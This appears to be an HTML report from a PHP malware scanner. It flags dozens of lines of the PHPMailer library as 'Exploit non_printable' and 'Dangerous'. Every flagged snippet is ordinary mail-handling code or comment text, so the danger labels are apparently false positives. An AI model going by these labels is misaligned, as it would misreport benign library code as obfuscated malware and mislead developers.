<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">) > </span><span style="color: #0000BB">mb_strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CharSet</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions anyway</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3139</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">has8bitChars</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[\x80-\xFF]/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3147</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">by paravoid</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3148</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mb</span><span style="color: #007700">-</span><span style="color: #0000BB">encode</span><span style="color: #007700">-</span><span style="color: #0000BB">mimeheader</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#60283</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">base64EncodeWrapMB</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$linebreak </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3194</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">quoted</span><span style="color: #007700">-</span><span style="color: #0000BB">printable</span><span style="color: #007700">-</span><span style="color: #0000BB">decode</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#89417 Adapted from this comment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3196</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max </span><span style="color: #007700">= </span><span style="color: #0000BB">76</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3198</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s available (>= PHP5.3)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'quoted_printable_encode'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3200</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">quoted_printable_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3208</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[^\r\n]{' </span><span style="color: #007700">. (</span><span style="color: #0000BB">$line_max </span><span style="color: #007700">- </span><span style="color: #0000BB">3</span><span style="color: #007700">) . </span><span style="color: #DD0000">'}[^=\r\n]{2}/'</span><span style="color: #007700">, </span><span style="color: #DD0000">"$0=\r\n"</span><span style="color: #007700">, </span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3212</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that was removed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3221</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQPphp</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3226</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3237</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3274</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">' '</span><span style="color: #007700">, </span><span style="color: #DD0000">'_'</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3288</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringAttachment</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3327</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True on successfully adding an attachment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3329</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addEmbeddedImage</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$cid</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'inline'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path</span><span style="color: #007700">) </span><span style="color: #0000BB">of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3374</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringEmbeddedImage</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3406</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">inlineImageExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3420</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachmentExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 342</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3434</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">alternativeExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3436</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !empty(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">AltBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3445</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearQueuedAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 345</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3485</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearBCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3498</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearReplyTos</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 349</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ReturnPath </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAllRecipients</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3521</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3530</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3541</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setError</span><span style="color: #007700">(</span><span style="color: #0000BB">$msg</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3563</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">an RFC 822 formatted date</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3568</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">rfcDate</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3573</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">date</span><span style="color: #007700">(</span><span style="color: #DD0000">'D, j M Y H:i:s O'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3578</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns </span><span style="color: #DD0000">'localhost.localdomain' </span><span style="color: #007700">if </span><span style="color: #0000BB">unknown</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3582</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">serverHostname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3589</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'gethostname'</span><span style="color: #007700">) && </span><span style="color: #0000BB">gethostname</span><span style="color: #007700">() !== </span><span style="color: #0000BB">false</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3603</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">lang</span><span style="color: #007700">(</span><span style="color: #0000BB">$key</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3614</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">] . </span><span style="color: #DD0000">' https://github.com/PHPMailer/PHPMailer/wiki/Troubleshooting'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3616</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3618</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the key </span><span style="color: #007700">as </span><span style="color: #0000BB">a fallback</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3619</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$key</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3626</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True </span><span style="color: #007700">if </span><span style="color: #0000BB">an error did occur</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3628</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isError</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3630</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">error_count </span><span style="color: #007700">> </span><span style="color: #0000BB">0</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3640</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fixEOL</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3648</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$nstr</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3660</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCustomHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
